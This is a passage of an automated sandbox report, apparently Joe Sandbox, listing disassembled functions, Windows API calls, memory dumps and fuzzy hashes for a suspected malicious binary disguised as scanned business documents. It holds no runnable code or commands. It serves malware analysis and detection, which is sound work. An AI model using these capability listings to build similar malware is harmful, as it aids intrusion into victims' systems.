                                                        • Part of subcall function 002E0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E0FCA
                                                        • Part of subcall function 002E0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E0FD6
                                                        • Part of subcall function 002E0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E0FE5
                                                        • Part of subcall function 002E0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E0FEC
                                                        • Part of subcall function 002E0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E1002
                                                      • GetLengthSid.ADVAPI32(?,00000000,002E1335), ref: 002E17AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002E17BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 002E17C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 002E17DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,002E1335), ref: 002E17EE
                                                      • HeapFree.KERNEL32(00000000), ref: 002E17F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: a871ce49bdebd483621fe50aeb984d00e1552c4e67598c0555dd82e8d8584401
                                                      • Instruction ID: f1794c718b7023985817eee5b8b34406e532bfe96fae01a84da3181702868bc5
                                                      • Opcode Fuzzy Hash: a871ce49bdebd483621fe50aeb984d00e1552c4e67598c0555dd82e8d8584401
                                                      • Instruction Fuzzy Hash: 5311BE315A0206FFDB119FA5CC49BEEBBBDEB49755F508028F4819B210C735A960CB60
                                                      Function 002E14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002E14FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 002E1506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 002E1515
                                                      • CloseHandle.KERNEL32(00000004), ref: 002E1520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002E154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 002E1563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 2640de4abf68c9f03035c91dee1d866ebeeaec08780d872985ff92ffa9cadb95
                                                      • Instruction ID: cf292ee903298f1712880be566e8bdd6bc6c9ca03a6e4522453d1658419ce0e8
                                                      • Opcode Fuzzy Hash: 2640de4abf68c9f03035c91dee1d866ebeeaec08780d872985ff92ffa9cadb95
                                                      • Instruction Fuzzy Hash: 8211267256024AAFDF128FA8DD49BDE7BADEF48744F048025FA05A21A0C375CE60DB60
                                                      Function 002A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,002A3379,002A2FE5), ref: 002A3390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002A339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002A33B7
                                                      • SetLastError.KERNEL32(00000000,?,002A3379,002A2FE5), ref: 002A3409
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: d3fb2aafd53206cdfa49f850ca113352f376ea825c06965ed9867ac55a68c232
                                                      • Instruction ID: 9f4743b3db62aacdecd4f944a6b806c67e8923e3c7f79b758b62a9f676038005
                                                      • Opcode Fuzzy Hash: d3fb2aafd53206cdfa49f850ca113352f376ea825c06965ed9867ac55a68c232
                                                      • Instruction Fuzzy Hash: 3F019C3723D312BFEA626F747C815972A8CDB0B774B300229F110841F0EF118D314984
                                                      Function 002B2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,002B5686,002C3CD6,?,00000000,?,002B5B6A,?,?,?,?,?,002AE6D1,?,00348A48), ref: 002B2D78
                                                      • _free.LIBCMT ref: 002B2DAB
                                                      • _free.LIBCMT ref: 002B2DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,002AE6D1,?,00348A48,00000010,00284F4A,?,?,00000000,002C3CD6), ref: 002B2DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,002AE6D1,?,00348A48,00000010,00284F4A,?,?,00000000,002C3CD6), ref: 002B2DEC
                                                      • _abort.LIBCMT ref: 002B2DF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: 416bad7e098009683172cb2f65fd2a0255c7ee4d21e9f5a2caa6a9781faac46d
                                                      • Instruction ID: 3de5ddf310852737759dab0c93d38b3e411e4e369474810f9727e440ae27a9eb
                                                      • Opcode Fuzzy Hash: 416bad7e098009683172cb2f65fd2a0255c7ee4d21e9f5a2caa6a9781faac46d
                                                      • Instruction Fuzzy Hash: 6DF02839575B03E7C6133B38BC0AEDA255DAFC67E1F244918F834921D6EE248C294920
                                                      Function 00318A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
                                                        • Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
                                                        • Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00318A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00318A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00318A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00318A80
                                                      • EndPath.GDI32(?), ref: 00318A90
                                                      • StrokePath.GDI32(?), ref: 00318AA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: e1d00203215e2ad749307b093ef6256f55979d336aed0edebb7e9eba5a43ad21
                                                      • Instruction ID: 43d22d2b801346f4f5a07c590286304cb3974f8aaef3e7c5008bec81959f2288
                                                      • Opcode Fuzzy Hash: e1d00203215e2ad749307b093ef6256f55979d336aed0edebb7e9eba5a43ad21
                                                      • Instruction Fuzzy Hash: 5F11F776040108FFDB129F94DC88EEA7F6CEB08350F00C022BA199A1A1C7719DA5DBA0
                                                      Function 002E51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 002E5218
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 002E5229
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E5230
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 002E5238
                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002E524F
                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 002E5261
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 76cda6a864e598cd4d0ec227a030a26b7fa14ded8a90fbfd013cb1d9fecb2f07
                                                      • Instruction ID: bfec172f1126becd2bd4cbae4b15b1b9bb006a4a515bd36854342de4a018ba30
                                                      • Opcode Fuzzy Hash: 76cda6a864e598cd4d0ec227a030a26b7fa14ded8a90fbfd013cb1d9fecb2f07
                                                      • Instruction Fuzzy Hash: EA018475A50715BBEB115FA69C49A9EBFB8EB48351F048065FA08A7280D670DC10CF60
                                                      Function 00281BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: 267a47bc38b5abf5041f6b58708915e4256b08c7ea7c723402cf650b1af45716
                                                      • Instruction ID: 5df1849c76b8703209bee509cb1205b5b9214e6897e41449f42dbb120ee82c84
                                                      • Opcode Fuzzy Hash: 267a47bc38b5abf5041f6b58708915e4256b08c7ea7c723402cf650b1af45716
                                                      • Instruction Fuzzy Hash: 770167B0942B5ABDE3008F6A8C85B52FFA8FF19354F04411BA15C4BA42C7F5A864CBE5
                                                      Function 002EEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002EEB30
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002EEB46
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 002EEB55
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB64
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB6E
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EEB75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: c72e75e9685c8fa226d538bfaa7456758266d52ce06c2dea4c3bae3a481ebbb3
                                                      • Instruction ID: 85dedc35e3474ef3ae5eefd99e88daf504aa70385be8f69934b3c9a60472ef14
                                                      • Opcode Fuzzy Hash: c72e75e9685c8fa226d538bfaa7456758266d52ce06c2dea4c3bae3a481ebbb3
                                                      • Instruction Fuzzy Hash: 46F03A72690168BBE7225B629C0EEEF7A7CEFCEB11F009168F611D1091E7A05A01C6B5
                                                      Function 002D7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 002D7452
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 002D7469
                                                      • GetWindowDC.USER32(?), ref: 002D7475
                                                      • GetPixel.GDI32(00000000,?,?), ref: 002D7484
                                                      • ReleaseDC.USER32(?,00000000), ref: 002D7496
                                                      • GetSysColor.USER32(00000005), ref: 002D74B0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: 2bfe3f8b1a598bbd3dd05c2966995d4a13f3321a150acf15906f4a7a20f0efc8
                                                      • Instruction ID: b0706e01ab95662bee83409219cb2d031467a4d8e3775f8d167621ab36716bb5
                                                      • Opcode Fuzzy Hash: 2bfe3f8b1a598bbd3dd05c2966995d4a13f3321a150acf15906f4a7a20f0efc8
                                                      • Instruction Fuzzy Hash: 1001AD31460215FFDB525F64DC08BEA7BBAFF08321F549064F915A21A0CB311E51EB10
                                                      Function 002E1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002E187F
                                                      • UnloadUserProfile.USERENV(?,?), ref: 002E188B
                                                      • CloseHandle.KERNEL32(?), ref: 002E1894
                                                      • CloseHandle.KERNEL32(?), ref: 002E189C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002E18A5
                                                      • HeapFree.KERNEL32(00000000), ref: 002E18AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 3f51a6148322b522762de775bbef5c98948086403037dc433e6de305a8e90ab0
                                                      • Instruction ID: 800d148a551ab7a2b4db4006ef6c57d3a3aa1752d2b353b1f4a01fe5a576d922
                                                      • Opcode Fuzzy Hash: 3f51a6148322b522762de775bbef5c98948086403037dc433e6de305a8e90ab0
                                                      • Instruction Fuzzy Hash: 5BE0C236494211BBDA025BA1ED0C98ABB2EFB4DB22B10D620F225810B0CB729420DB50
                                                      Function 0028BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 0028BEB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: D%5$D%5$D%5$D%5D%5
                                                      • API String ID: 1385522511-4083595773
                                                      • Opcode ID: 1103ad6b476d9455d9b0b0150aeb020837f26b8fe0b64e3e17fdd2e387829d4a
                                                      • Instruction ID: 1285572c52f9d7986d2129d2bb1ed121d705d205967f15125a64e377d5030111
                                                      • Opcode Fuzzy Hash: 1103ad6b476d9455d9b0b0150aeb020837f26b8fe0b64e3e17fdd2e387829d4a
                                                      • Instruction Fuzzy Hash: A8918B79A21206DFCB19DF58C0906AAB7F1FF59300F24856ED941AB390E731ADA1CBD0
                                                      Function 00307B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002A0242: EnterCriticalSection.KERNEL32(0035070C,00351884,?,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A024D
                                                        • Part of subcall function 002A0242: LeaveCriticalSection.KERNEL32(0035070C,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A028A
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      • __Init_thread_footer.LIBCMT ref: 00307BFB
                                                        • Part of subcall function 002A01F8: EnterCriticalSection.KERNEL32(0035070C,?,?,00298747,00352514), ref: 002A0202
                                                        • Part of subcall function 002A01F8: LeaveCriticalSection.KERNEL32(0035070C,?,00298747,00352514), ref: 002A0235
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: +T-$5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-4161847683
                                                      • Opcode ID: 29263c30720190270720092becbf7c5c473dd22fdce7a42bb192fc02240905b0
                                                      • Instruction ID: 958c711d493bd297b141619b8af077acfae9d528f4a3136e4e257df7c9ded41b
                                                      • Opcode Fuzzy Hash: 29263c30720190270720092becbf7c5c473dd22fdce7a42bb192fc02240905b0
                                                      • Instruction Fuzzy Hash: 44919C74A06209AFCB16EF54D8A0DAEB7B5BF49300F108059F8069B291DB31AE55CB50
                                                      Function 002EC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002EC6EE
                                                      • _wcslen.LIBCMT ref: 002EC735
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002EC79C
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002EC7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default
                                                      • String ID: 0
                                                      • API String ID: 1227352736-4108050209
                                                      • Opcode ID: 7e0e64b991813e10b68674609b2d2de6d24a60318b9908b68877d9096541d932
                                                      • Instruction ID: 2240f28049d4d5bc6bffbdc9761817dddd08bed21d40347399b00e3fe5c510c3
                                                      • Opcode Fuzzy Hash: 7e0e64b991813e10b68674609b2d2de6d24a60318b9908b68877d9096541d932
                                                      • Instruction Fuzzy Hash: E45105716B43825BD7519FAAC844B6BB7ECAF86310F640929F991D31E0DB70CC258F52
                                                      Function 0030AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 0030AEA3
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                      • GetProcessId.KERNEL32(00000000), ref: 0030AF38
                                                      • CloseHandle.KERNEL32(00000000), ref: 0030AF67
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseExecuteHandleProcessShell_wcslen
                                                      • String ID: <$@
                                                      • API String ID: 146682121-1426351568
                                                      • Opcode ID: 66a2b9415551bfb484dbf7d521af69c930eec769ad8e3c6ba6a1d345f16bfb01
                                                      • Instruction ID: 7c53a2b7e0cb1a3be82e505630aff101d5fe18b41a9cafb7ee266e66e7c137c9
                                                      • Opcode Fuzzy Hash: 66a2b9415551bfb484dbf7d521af69c930eec769ad8e3c6ba6a1d345f16bfb01
                                                      • Instruction Fuzzy Hash: C1719774A11619CFCB15EF64D494A9EBBF0BF08300F148499E816AB7A2CB34ED51CFA1
                                                      Function 002E719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
